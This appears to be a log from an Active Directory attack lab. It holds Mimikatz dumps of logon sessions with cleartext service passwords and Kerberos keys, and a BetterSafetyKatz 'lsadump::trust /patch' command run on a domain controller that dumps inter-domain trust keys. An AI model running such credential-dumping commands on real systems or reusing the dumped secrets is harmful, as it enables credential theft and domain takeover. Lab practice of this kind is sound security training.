Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:42:17 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1115
* Username : srvadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
rc4_hmac_nt a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old a98e18228819e8eec3dfa33cb68b0728
rc4_md4 a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_nt_exp a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old_exp a98e18228819e8eec3dfa33cb68b0728
Authentication Id : 0 ; 131118 (00000000:0002002e)
Session : Service from 0
User Name : appadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:35:23 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1117
* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ActuallyTheWebServer1
* Key List :
aes256_hmac 68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
aes128_hmac 449e9900eb0d6ccee8dd9ef66965797e
rc4_hmac_nt d549831a955fee51a43c83efb3928fa7
rc4_hmac_old d549831a955fee51a43c83efb3928fa7
rc4_md4 d549831a955fee51a43c83efb3928fa7
rc4_hmac_nt_exp d549831a955fee51a43c83efb3928fa7
rc4_hmac_old_exp d549831a955fee51a43c83efb3928fa7
Authentication Id : 0 ; 131034 (00000000:0001ffda)
Session : Service from 0
User Name : websvc
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:35:23 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1114
* Username : websvc
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : AServicewhichIsNotM3@nttoBe
* Key List :
aes256_hmac 2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
aes128_hmac 86a353c1ea16a87c39e2996253211e41
rc4_hmac_nt cc098f204c5887eaa8253e7c2749156f
rc4_hmac_old cc098f204c5887eaa8253e7c2749156f
rc4_md4 cc098f204c5887eaa8253e7c2749156f
rc4_hmac_nt_exp cc098f204c5887eaa8253e7c2749156f
rc4_hmac_old_exp cc098f204c5887eaa8253e7c2749156f
Authentication Id : 0 ; 20853 (00000000:00005175)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:06 PM
SID : S-1-5-96-0-0
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Authentication Id : 0 ; 20821 (00000000:00005155)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:06 PM
SID : S-1-5-96-0-1
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:35:05 PM
SID : S-1-5-18
* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Trust Dump
[dcorp-dc]: PS C:\Users\Administrator\Documents> .\BetterSafetyKatz.exe '"lsadump::trust /patch"' "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::trust /patch
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/27/2024 12:12:19 AM - CLEAR - 26 43 99 cb bb 6d 10 f0 04 37 57 bd fa 1f 77 d6 93 28 68 1f 5d 35 a8 e3 b1 25 46 e7
* aes256_hmac cfb1299ec914c29461e1b57009c8b39c9239aca222a86d748be4e6a953ac7ca4
* aes128_hmac e5f04970548f0b240ee6947605fce7b5
* rc4_hmac_nt 68a7f836e94f9668b8a215d486f23a38
[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 6/27/2024 12:12:19 AM - CLEAR - 26 43 99 cb bb 6d 10 f0 04 37 57 bd fa 1f 77 d6 93 28 68 1f 5d 35 a8 e3 b1 25 46 e7
* aes256_hmac 47641f8bc724115760c2ef5ab1941996dcef5be9bdce13bcf5057d3036694667
* aes128_hmac 13c6b14ec690d6e5e17377bd9d285c8a
* rc4_hmac_nt 68a7f836e94f9668b8a215d486f23a38
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/27/2024 12:11:53 AM - CLEAR - 9c fe ec 1b d3 ed ee 2f 21 34 aa f7 77 c1 6d 5e d6 65 50 6f 82 33 df 17 5c 3a 95 49
* aes256_hmac fd9f9e762002c3a0c0d3b4681ae0bd9f0abf1484a0a8c8523ddf325b4035ade7
* aes128_hmac 9e9914fc26168e51a4d44a3851ec9506
* rc4_hmac_nt 881744a51055cdda6698c535e629fc1d
[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 6/27/2024 12:11:53 AM - CLEAR - 9c fe ec 1b d3 ed ee 2f 21 34 aa f7 77 c1 6d 5e d6 65 50 6f 82 33 df 17 5c 3a 95 49
* aes256_hmac 786dc532d32610fbe36bc004490091ad1c744186269195dd58ac9ac36b665fd0
* aes128_hmac 276b6a9960f4158694f028405d7395a9
* rc4_hmac_nt 881744a51055cdda6698c535e629fc1d
Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:16:10 PM - CLEAR - cf e8 36 49 c3 08 a6 2a fe 76 d2 0a 0c 5c aa e5 67 a1 af f6 25 bb ec d0 ed 1e 08 5d
* aes256_hmac 64424a8f2a4def288b986a3747c3eed7493e1d75bfff0461afbb072180e61afe
* aes128_hmac f4aaf5eb7059977b9ea4cde31ee8eddc
* rc4_hmac_nt 214a518fb9edf4be816f207b9ba19d69
[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:16:10 PM - CLEAR - cf e8 36 49 c3 08 a6 2a fe 76 d2 0a 0c 5c aa e5 67 a1 af f6 25 bb ec d0 ed 1e 08 5d
* aes256_hmac 2bf47a8aca4420dbd00c836677489636bace0cf279d20387eae2c935f8816652
* aes128_hmac 2ed7f416a3a42794e54e3b567eaa0e53
* rc4_hmac_nt 214a518fb9edf4be816f207b9ba19d69
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:03:04 PM - CLEAR - 0c f8 9f d9 54 46 8a 29 23 0c 65 1f 45 69 c8 c7 6d f0 5c bf eb 69 63 52 f9 3c 2a dd
* aes256_hmac fed485bb861c2a70cf8436cc2bc561bdd7502ff3f06a3e0116e93de860617216
* aes128_hmac 25f49733618f43d90ac60661e0d45e6a
* rc4_hmac_nt 5254e4d05c51a801670314042ae33f40
[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:03:04 PM - CLEAR - 0c f8 9f d9 54 46 8a 29 23 0c 65 1f 45 69 c8 c7 6d f0 5c bf eb 69 63 52 f9 3c 2a dd
* aes256_hmac b589e722cc645c71e1b6743b64ec68ad4f2e6ffab7ca0fe7e40971713f4ac465
* aes128_hmac 0dd190b6a2217e9f8dbc82d2b7e78e95
* rc4_hmac_nt 5254e4d05c51a801670314042ae33f40
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 7/12/2024 10:16:07 PM - CLEAR - 55 cb 05 4c 82 1a 31 bb b8 2d c5 b9 cc fd 2d 3e 33 d5 e0 92 93 cf f9 ac 6f ac 11 ed
* aes256_hmac 225bd65839ee11918c44d7a4819736245a4d54024173ef4a91ef5fb2c29669df
* aes128_hmac aebc8f223defffec09befded2c30d6c4
* rc4_hmac_nt 1fcd1aeb03aab0b98840321e4a0d17f3
[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:16:07 PM - CLEAR - 55 cb 05 4c 82 1a 31 bb b8 2d c5 b9 cc fd 2d 3e 33 d5 e0 92 93 cf f9 ac 6f ac 11 ed
* aes256_hmac 03dbd3425e6cc9aa87ed201713d7a8dbb04ef5c651407580a5b2c11e67bff85b
* aes128_hmac 34de1a1db802e71580e907214774dcc9
* rc4_hmac_nt 1fcd1aeb03aab0b98840321e4a0d17f3
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 7/12/2024 10:03:00 PM - CLEAR - 10 fc b0 8b ae b3 a7 21 5f 52 40 d5 f7 e9 45 5a fe 6e ee dd da f7 4b 69 f6 c8 3d a9
* aes256_hmac 684bc2d9fa516539e42ba27f8638ce273444b01768d23001bbbb1c96c2f3a7ca
* aes128_hmac 6b81568547ccd72e875ba5bf92870f6c
* rc4_hmac_nt c1a089de694b99c31207cf85ca9401c7
[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:03:00 PM - CLEAR - 10 fc b0 8b ae b3 a7 21 5f 52 40 d5 f7 e9 45 5a fe 6e ee dd da f7 4b 69 f6 c8 3d a9
* aes256_hmac 903cd48563f50588d7993632939015e44f15edafe9e0d6ffdc55dec6e990f20c
* aes128_hmac 1181192f6c730988662d1d43a55daba9
* rc4_hmac_nt c1a089de694b99c31207cf85ca9401c7
mimikatz(commandline) # exit
Bye!